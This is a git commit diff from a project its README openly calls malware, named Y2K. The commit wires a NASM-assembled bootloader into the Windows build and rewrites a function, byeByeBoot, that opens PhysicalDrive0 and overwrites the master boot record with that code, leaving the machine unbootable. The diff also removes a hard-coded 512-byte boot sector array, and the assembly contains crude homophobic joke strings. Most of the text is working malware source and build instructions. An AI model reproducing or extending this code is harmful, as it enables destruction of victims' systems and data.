Add dynamic bootloader compilation

2024-02-22 02:06:07 +00:00 · 2024-02-22 02:06:07 +00:00 · 51b7464f02
parent 0b4cc4f6b6
commit 51b7464f02
8 changed files with 209 additions and 259 deletions
--- a/.gitignore
+++ b/.gitignore
@ -1,4 +1,5 @@
 bin/
 bin/*.exe
 res/*.o
-bootloader/*.bin
+mbr/*.bin
+mbr/*.o
--- a/8
+++ b/8
@ -1,6 +1,8 @@
 .PHONY: all clean

 CXX     := i686-w64-mingw32-g++
+LD	:= i686-w64-mingw32-ld
+NASM	:= nasm
 WINDRES := i686-w64-mingw32-windres

 SRC := $(wildcard src/*)
@ -10,8 +12,10 @@ all: main
 main: $(BIN)
 	@mkdir -p bin
 	$(WINDRES) -o res/resource.o res/resource.rc
-	$(CXX) $(SRC) res/resource.o -static -l gdi32 -l winmm -o bin/Y2K
+	$(NASM) -o mbr/bootloader.bin mbr/bootloader.asm
+	$(LD) -r -b binary -o mbr/bootloader.o mbr/bootloader.bin
+	$(CXX) $(SRC) res/resource.o mbr/bootloader.o -static -l gdi32 -l winmm -o bin/Y2K

 clean:
 	@echo "Cleaning up..."
-	@rm -fr bin/* res/*.o bootloader/*.bin
+	@rm -fr bin/* res/*.o mbr/*.bin mbr/*.o
--- a/README.org
+++ b/README.org
@ -11,38 +11,42 @@ To run this malware you need a Windows XP macchine with date set to <2000-01-01>
 You will need *MinGW* and *Make*. You can parse the
 argument =CXX= to change the C++ compiler (the default is ~i686-w64-mingw-g++~) and
 the =WINDRES= to change the default ~windres~ command (the default is ~i686-w64-mingw-windres~).
-You can change the =CXX= and =WINDRES= to ~x86_64-wi64-mingw-g++~ and ~x86_64-wi64-mingw-windres~ respectively to build it natively for 64bit envioriments.
+Others arguments are =NASM= and =LD= for changing the nasm and ld commands.
+You can change the =CXX= and =WINDRES= and =LD= to ~x86_64-w64-mingw-g++~ and ~x86_64-w64-mingw-windres~ and ~x86_64-w64-mingw32-ld~ respectively to build it natively for 64bit envioriments.

 *** Arch linux:

 #+BEGIN_SRC shell
-pacman -S mingw-w64 make
+pacman -S make mingw-w64 nasm
 make
 #+END_SRC

 *** Ubuntu

 #+BEGIN_SRC shell
-apt install mingw-w64 make
+apt install make mingw-w64 nasm
 make
 #+END_SRC


-You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= files on folder =bootloader/=.
+You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= and =.o= files on folder =mbr/=.

 ** On Windows

-You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler.
+You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler
+and [[https://nasm.us/][NASM]].
 Then run the command:

 #+BEGIN_SRC batch
 windres -o res\resource.o res\resource.rc
-g++ src\* res\resource.o -static -l gdi32 -l winmm -o Y2K
+nasm -o mbr\bootloader.bin mbr\bootloader.asm
+ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
+g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
 #+END_SRC

 * Bootloader

-This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code and building instructions for the binaies can be found [[src/bootloader/][here]].
+This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found [[src/mbr/][here]].

 * Payloads

--- a/mbr/README.org
+++ b/mbr/README.org
@ -2,6 +2,5 @@

 This is the bootloader source code of Y2K. to build run ~nasm bootloader.asm -o bootloader.bin~

-You can execute the ~python getHex.py bootloader.bin~ to get the formated bootloader bytes plus
-the size of the generated array and put it in the bootloader contant in =src/payloads.h= alongside
-with the printed size.
+You need to execute ~ld -r -b binary -o bootloader.o bootloader.bin~ to create the object file used to
+compile the code.
--- a/mbr/bootloader.asm
+++ b/mbr/bootloader.asm
@ -120,8 +120,8 @@ eternal:


 ; Set cursor position
-; dl - Columns 	- x
-; dh - Rows	- y
+; dl  Columns	x
+; dh  Rows	y
 cursor:
 	cli
 	mov ah, 0x2
@ -130,7 +130,7 @@ cursor:
 	ret

 ; Print some gay string
-; si - string
+; si  string
 print:
 	cli
 	mov bl, 0x21
@ -144,7 +144,7 @@ print:
 	ret

 ; Delay
-; cx - delay value in microsseconds
+; cx  delay value in microsseconds
 sleep:
 	cli
 	mov ah, 0x86
@ -162,5 +162,5 @@ easter3 db "I really hate this mbr payload.", 0
 easter4 db "You're very gay. B)", 0


-times 510 - ($-$$) db 0 ; Fill the file with 0 510 times'
+times 510 - ($-$$) db 0 ; Fill the file with 0 510 times
 dw 0xAA55 ; Magic number used by BIOS to identify the file
--- a/mbr/getHex.py
+++ b/mbr/getHex.py
@ -1,30 +0,0 @@
-from sys import argv, exit as exitc
-
-if len(argv) > 2:
-    print('Please inform just one file!')
-    exitc(2)
-
-elif len(argv) != 2:
-    print('Plase inform a file!')
-    exitc(3)
-
-try:
-    file = open(argv[1], 'rb')
-
-except FileNotFoundError:
-    print('The specified file was not found!')
-    exitc(4)
-
-content = file.read()
-file.close()
-
-for i in range(len(content)):
-    if i%12 == 0:
-        print('')
-
-    print(format(content[i], '#04x'), end='')
-
-    if i != len(content)-1:
-        print(', ', end='')
-
-print('\nSize:', len(content)) 
--- a/src/main.cpp
+++ b/src/main.cpp
@ -2,6 +2,9 @@
 #include "payloads.h"
 #include "bytebeats.h"

+extern char binary_mbr_bootloader_bin_start[];
+extern char binary_mbr_bootloader_bin_end[];
+
 int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
 	
 	HANDLE t1, t2, t3, t4;
@ -19,7 +22,11 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
 					PlaySound(MAKEINTRESOURCE(2), hInstance, SND_RESOURCE);
 					ExitProcess(0);
 				case 2:
-					Payloads::byeByeBoot();
+					Payloads::byeByeBoot((unsigned int)
+							(binary_mbr_bootloader_bin_end - 
+							binary_mbr_bootloader_bin_start),
+							binary_mbr_bootloader_bin_start,
+							binary_mbr_bootloader_bin_end);
 					break;
 				case 3:
 					ExitProcess(0);
--- a/src/payloads.h
+++ b/src/payloads.h
@ -47,57 +47,22 @@ namespace Payloads {
 			return 3;
 	}
 	
-	void byeByeBoot(){
-		const unsigned char bootloader[512] = {
-			0xFA, 0x68, 0x00, 0xA0, 0x07, 0x31, 0xFF, 0xB8, 0x13, 0x00, 0xCD, 0x10,
-			0xB9, 0x15, 0x00, 0xE8, 0xB8, 0x00, 0xBE, 0xD3, 0x7C, 0xB2, 0x0C, 0xB6,
-			0x0A, 0xE8, 0x97, 0x00, 0xE8, 0x9C, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0xA5,
-			0x00, 0xBE, 0xE3, 0x7C, 0xB2, 0x06, 0xB6, 0x0C, 0xE8, 0x84, 0x00, 0xE8,
-			0x89, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0x92, 0x00, 0x30, 0xD2, 0x30, 0xF6,
-			0xE8, 0x74, 0x00, 0xBE, 0x01, 0x7D, 0xB3, 0x07, 0xB4, 0x0E, 0xAC, 0xCD,
-			0x10, 0x08, 0xC0, 0x75, 0xF7, 0x80, 0xC2, 0x10, 0xE8, 0x60, 0x00, 0x30,
-			0xE4, 0xCD, 0x16, 0x3C, 0x08, 0x74, 0x34, 0x3C, 0x0D, 0x74, 0x27, 0x80,
-			0xFA, 0x27, 0x7D, 0x22, 0x3C, 0x1B, 0x74, 0x2E, 0x3C, 0x36, 0x74, 0x2F,
-			0x3C, 0x39, 0x74, 0x30, 0x3C, 0x09, 0x74, 0x31, 0xB4, 0x0A, 0x30, 0xFF,
-			0xB3, 0x0F, 0xB9, 0x01, 0x00, 0xCD, 0x10, 0xFE, 0xC2, 0xE8, 0x2F, 0x00,
-			0xEB, 0xCD, 0x30, 0xD2, 0xFE, 0xC6, 0xE8, 0x26, 0x00, 0xEB, 0xC4, 0xFE,
-			0xCA, 0xE8, 0x1F, 0x00, 0xEB, 0xBD, 0xBE, 0x12, 0x7D, 0xEB, 0x0D, 0xBE,
-			0x2D, 0x7D, 0xEB, 0x08, 0xBE, 0x48, 0x7D, 0xEB, 0x03, 0xBE, 0x68, 0x7D,
-			0x30, 0xD2, 0x30, 0xF6, 0xE8, 0x04, 0x00, 0xE8, 0x09, 0x00, 0xF4, 0xFA,
-			0xB4, 0x02, 0xB7, 0x00, 0xCD, 0x10, 0xC3, 0xFA, 0xB3, 0x21, 0xB4, 0x0E,
-			0xAC, 0xFE, 0xC3, 0xCD, 0x10, 0x08, 0xC0, 0x75, 0xF5, 0xC3, 0xFA, 0xB4,
-			0x86, 0xBA, 0x00, 0x00, 0xCD, 0x15, 0xC3, 0x48, 0x61, 0x70, 0x70, 0x79,
-			0x20, 0x6E, 0x65, 0x77, 0x20, 0x59, 0x65, 0x61, 0x72, 0x21, 0x00, 0x45,
-			0x6E, 0x6A, 0x6F, 0x79, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x75, 0x73,
-			0x65, 0x6C, 0x65, 0x73, 0x73, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61,
-			0x64, 0x2E, 0x2E, 0x2E, 0x00, 0x54, 0x79, 0x70, 0x65, 0x20, 0x73, 0x6F,
-			0x6D, 0x65, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x3A, 0x20, 0x00, 0x59, 0x6F,
-			0x75, 0x20, 0x66, 0x69, 0x6E, 0x64, 0x20, 0x61, 0x20, 0x45, 0x61, 0x73,
-			0x74, 0x65, 0x72, 0x45, 0x67, 0x67, 0x2C, 0x20, 0x4F, 0x4D, 0x47, 0x21,
-			0x00, 0x54, 0x68, 0x69, 0x73, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x69,
-			0x73, 0x20, 0x73, 0x6F, 0x20, 0x62, 0x75, 0x67, 0x67, 0x79, 0x2E, 0x20,
-			0x3E, 0x3A, 0x43, 0x00, 0x49, 0x20, 0x72, 0x65, 0x61, 0x6C, 0x6C, 0x79,
-			0x20, 0x68, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6D,
-			0x62, 0x72, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x00,
-			0x59, 0x6F, 0x75, 0x27, 0x72, 0x65, 0x20, 0x76, 0x65, 0x72, 0x79, 0x20,
-			0x67, 0x61, 0x79, 0x2E, 0x20, 0x42, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
-		};
+	void byeByeBoot(int size,char* start,char* end){
+		unsigned char bootloader[size];
+		int index = 0;
+		for(char* i = start; i != end; ++i) {
+			bootloader[index] = *i;
+			index++;
+		}

 		DWORD bWriten;
 		
-		HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"), GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
-		WriteFile(mbr, bootloader, 512, &bWriten, NULL);
+		HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"),
+				GENERIC_ALL,
+				FILE_SHARE_READ | FILE_SHARE_WRITE,
+				0, OPEN_EXISTING, 0, 0);
+
+		WriteFile(mbr, bootloader, size, &bWriten, NULL);
 		CloseHandle(mbr);
 	}